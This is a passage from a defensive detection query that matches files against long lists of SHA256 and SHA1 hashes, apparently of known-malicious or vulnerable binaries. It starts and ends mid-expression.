ESCAPE '\\' OR Hashes LIKE '%SHA256=31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374%' ESCAPE '\\' OR Hashes LIKE '%SHA256=06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347%' ESCAPE '\\' OR Hashes LIKE '%SHA256=552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de%' ESCAPE '\\' OR Hashes LIKE '%SHA256=314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890%' ESCAPE '\\' OR Hashes LIKE '%SHA256=19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200%' ESCAPE '\\' OR Hashes LIKE '%SHA256=677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993%' ESCAPE '\\' OR Hashes LIKE '%SHA256=082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003%' ESCAPE '\\' OR Hashes LIKE '%SHA256=26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15%' ESCAPE '\\' OR Hashes LIKE '%SHA256=543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433%' ESCAPE '\\' OR Hashes LIKE '%SHA256=da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec%' ESCAPE '\\' OR Hashes LIKE '%SHA256=771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230%' ESCAPE '\\' OR Hashes LIKE '%SHA256=97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893%' ESCAPE '\\') OR sha1 IN ('2261198385d62d2117f50f631652eded0ecc71db', '8db869c0674221a2d3280143cbb0807fac08e0cc', '27d3ebea7655a72e6e8b95053753a25db944ec0f', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '21e6c104fe9731c874fab5c9560c929b2857b918', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '2f991435a6f58e25c103a657d24ed892b99690b8', 'f02af84393e9627ba808d4159841854a6601cf80', 'bb962c9a8dda93e94fef504c4159de881e4706fe', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '6523b3fd87de39eb5db1332e4523ce99556077dc', '72966ca845759d239d09da0de7eebe3abe86fee3', '57511ef5ff8162a9d793071b5bf7ebe8371759de', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '1d0df45ee3fa758f0470e055915004e6eae54c95', 'd5fd9fe10405c4f90235e583526164cd0902ed86', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', '7d7c03e22049a725ace2a9812c72b53a66c2548b', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '468e2e5505a3d924b14fedee4ddf240d09393776', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', 
'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', '078ae07dec258db4376d5a2a05b9b508d68c0123', '623cd2abef6c92255f79cbbd3309cb59176771da', '1f3a9265963b660392c4053329eb9436deeed339', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', 'c834c4931b074665d56ccab437dfcc326649d612', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', '51b60eaa228458dee605430aae1bc26f3fc62325', '3270720a066492b046d7180ca6e60602c764cac7', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', '19bd488fe54b011f387e8c5d202a70019a204adf', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '205c69f078a563f54f4c0da2d02a25e284370251', 'f9feb60b23ca69072ce42264cd821fe588a186a6', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '4e826430a1389032f3fe06e2cc292f643fb0c417', '7ab4565ba24268f0adadb03a5506d4eb1dc7c181', 'dc7b022f8bd149efbcb2204a48dce75c72633526', '0307d76750dd98d707c699aee3b626643afb6936', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', 'c948ae14761095e4d76b55d9de86412258be7afd', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', '745bad097052134548fe159f158c04be5616afc2', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'ac13941f436139b909d105ad55637e1308f49d9a', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', 'cc0e0440adc058615e31e8a52372abadf658e6b1', '5520ac25d81550a255dc16a0bb89d4b275f6f809', 
'6afc6b04cf73dd461e4a4956365f25c1f1162387', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '6003184788cd3d2fc624ca801df291ccc4e225ee', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '3abb9d0a9d600200ae19c706e570465ef0a15643', '27eab595ec403580236e04101172247c4f5d5426', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', '9c256edd10823ca76c0443a330e523027b70522d', '35829e096a15e559fcbabf3441d99e580ca3b26e', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '054a50293c7b4eea064c91ef59cf120d8100f237', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '14bf0eaa90e012169745b3e30c281a327751e316', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '879fcc6795cebe67718388228e715c470de87dca', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'd62fa51e520022483bdc5847141658de689c0c29', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', '3805e4e08ad342d224973ecdade8b00c40ed31be', '65d8a7c2e867b22d1c14592b020c548dd0665646', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', 
'0b8b83f245d94107cb802a285e6529161d9a834d', 'c969f1f73922fd95db1992a5b552fbc488366a40', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'da9cea92f996f938f699902482ac5313d5e8b28e', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 'f052dc35b74a1a6246842fbb35eb481577537826', 'f0c463d29a5914b01e4607889094f1b7d95e7aaf', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '7fb52290883a6b69a96d480f2867643396727e83', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '693a2645c28fc3b248fda95179c36c3ac64f6fc2', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', 'fe10018af723986db50701c8532df5ed98b17c39', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', '82ba5513c33e056c3f54152c8555abf555f3e745', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', 'bbc1e5fd826961d93b76abd161314cb3592c4436', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', 'b03b1996a40bfea72e4584b82f6b845c503a9748', 'c771ea59f075170e952c393cfd6fc784b265027c', 'cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1', '0918277fcdc64a9dc51c04324377b3468fa1269b', 'b09bcc042d60d2f4c0d08284818ed198cededa04', '8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89', '15df139494d2c40a645fb010908551185c27f3c5', '012db3a80faf1f7f727b538cbe5d94064e7159de', 'd04e5db5b6c848a29732bfd52029001f23c3da75', '490109fa6739f114651f4199196c5121d1c6bdf2', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', 'a87d6eac2d70a3fbc04e59412326b28001c179de', '3f223581409492172a1e875f130f3485b90fbe5f', '5db61d00a001fd493591dc919f69b14713889fc5', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', '9d07df024ec457168bf0be7e0009619f6ac4f13c', 
'9a35ae9a1f95ce4be64adc604c80079173e4a676', 'c6bd965300f07012d1b651a9b8776028c45b149a', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '9c24dd75e4074041dbe03bf21f050c77d748b8e9', 'dc55217b6043d819eadebd423ff07704ee103231', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', 'c6d349823bbb1f5b44bae91357895dba653c5861', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', 'eb1ecad3d37bb980f908bf1a912415cff32e79e6', 'eb0d45aa6f537f5b2f90f3ad99013606eafcd162', '6053d258096bccb07cb0057d700fe05233ab1fbb', '29a190727140f40cea9514a6420f5a195e36386b', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', '99201c9555e5faf6e8d82da793b148311f8aa4b8', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', 'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', '943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 
'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', 